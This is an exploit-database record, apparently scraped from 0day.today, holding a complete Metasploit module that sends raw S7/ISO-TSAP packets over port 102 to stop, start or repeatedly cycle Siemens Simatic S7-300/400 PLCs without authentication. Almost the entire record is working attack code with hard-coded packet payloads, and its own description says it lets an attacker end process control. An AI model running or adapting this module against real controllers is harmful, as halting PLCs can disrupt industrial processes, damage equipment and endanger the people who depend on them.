Siemens Simatic S7-300/400 CPU START/STOP Module

{"type": "zdt", "lastseen": "2016-04-20T01:30:06", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Siemens Simatic S7-300/400 CPU START/STOP Module", "published": "2012-07-13T00:00:00", "href": "http://0day.today/exploit/description/18989", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for hardware platform in category remote exploits", "hash": "fa33c0ae8d35f9d63f70b838c331e39ebf1a4a1be32a9e21396485709a50d14f", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "# Exploit Title: Siemens Simatic S7 300/400 CPU command module\r\n# Date: 7-13-2012\r\n# Exploit Author: Dillon Beresford\r\n# Vendor Homepage: http://www.siemens.com/\r\n# Tested on: Siemens Simatic S7-300 PLC\r\n# CVE : None\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Rex::Socket::Tcp\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',\r\n 'Description' => %q{\r\n The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP\r\n this modules allows an attacker to perform administrative commands without authentication.\r\n This module allows a remote user to change the state of the PLC between\r\n STOP and START, allowing an attacker to end process control by the PLC.\r\n },\r\n 'Author' => 'Dillon Beresford',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],\r\n ],\r\n 'Version' => '$Revision$',\r\n 'DisclosureDate' => 'May 09 2011'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(102),\r\n OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),\r\n OptInt.new('CYCLES',[true,\"Set the amount of CPU STOP/RUN cycles.\",10])\r\n ], self.class)\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n \r\n cpu = datastore['MODE'] || ''\r\n cycles = datastore['CYCLES'] || ''\r\n \r\n stop_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x10\\x00\"+\r\n \"\\x00\\x29\\x00\\x00\\x00\\x00\\x00\\x09\"+\r\n \"\\x50\\x5f\\x50\\x52\\x4f\\x47\\x52\\x41\"+\r\n \"\\x4d\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\"\r\n ]\r\n \r\n start_cpu_pkt =\r\n [\r\n \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\"+\r\n \"\\x00\\x01\\x00\\xc1\\x02\\x01\\x00\\xc2\"+\r\n \"\\x02\\x01\\x02\\xc0\\x01\\x09\",\r\n \r\n \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\xff\\xff\\x00\\x08\\x00\"+\r\n \"\\x00\\xf0\\x00\\x00\\x01\\x00\\x01\\x03\"+\r\n \"\\xc0\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x40\\x00\\x01\\x84\\x00\\x00\\x00\",\r\n \r\n \"\\x03\\x00\\x00\\x1f\\x02\\xf0\\x80\\x32\"+\r\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\"+\r\n \"\\x00\\x04\\x01\\x12\\x0a\\x10\\x02\\x00\"+\r\n \"\\x10\\x00\\x00\\x83\\x00\\x00\\x00\",\r\n \r\n \r\n \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\"+ \r\n \"\\x01\\x00\\x00\\x00\\x02\\x00\\x14\\x00\"+\r\n \"\\x00\\x28\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n \"\\xfd\\x00\\x00\\x09\\x50\\x5f\\x50\\x52\"+\r\n \"\\x4f\\x47\\x52\\x41\\x4d\"\r\n \r\n ]\r\n # CPU STOP \r\n if(cpu == 1)\r\n connect()\r\n stop_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # CPU START\r\n if(cpu == 2)\r\n connect()\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n # STOP / START CPU\r\n for n in 0..cycles\r\n if(cpu == 3)\r\n connect()\r\n # We assume PLC is up and running (issue a stop command)\r\n stop_cpu_pkt.each do |i| \r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n \r\n connect()\r\n # We assume PLC is has been stopped (issue a start command)\r\n start_cpu_pkt.each do |i|\r\n sock.put(\"#{i}\")\r\n sleep(0.005)\r\n end\r\n end\r\n end\r\n \r\n data = sock.get_once() \r\n print_good(\"#{ip} PLC is running, iso-tsap port is open.\")\r\n if(cpu == 'true')\r\n print_status(\"Putting the PLC into START mode.\")\r\n elsif(cpu == 'false')\r\n print_status(\"Putting the PLC into STOP mode.\")\r\n end\r\n disconnect()\r\n rescue ::EOFError\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-18989", "sourceHref": "http://0day.today/exploit/18989", "modified": "2012-07-13T00:00:00", "reporter": "Dillon Beresford", "viewCount": 2, "enchantments": {"vulnersScore": 8.5}}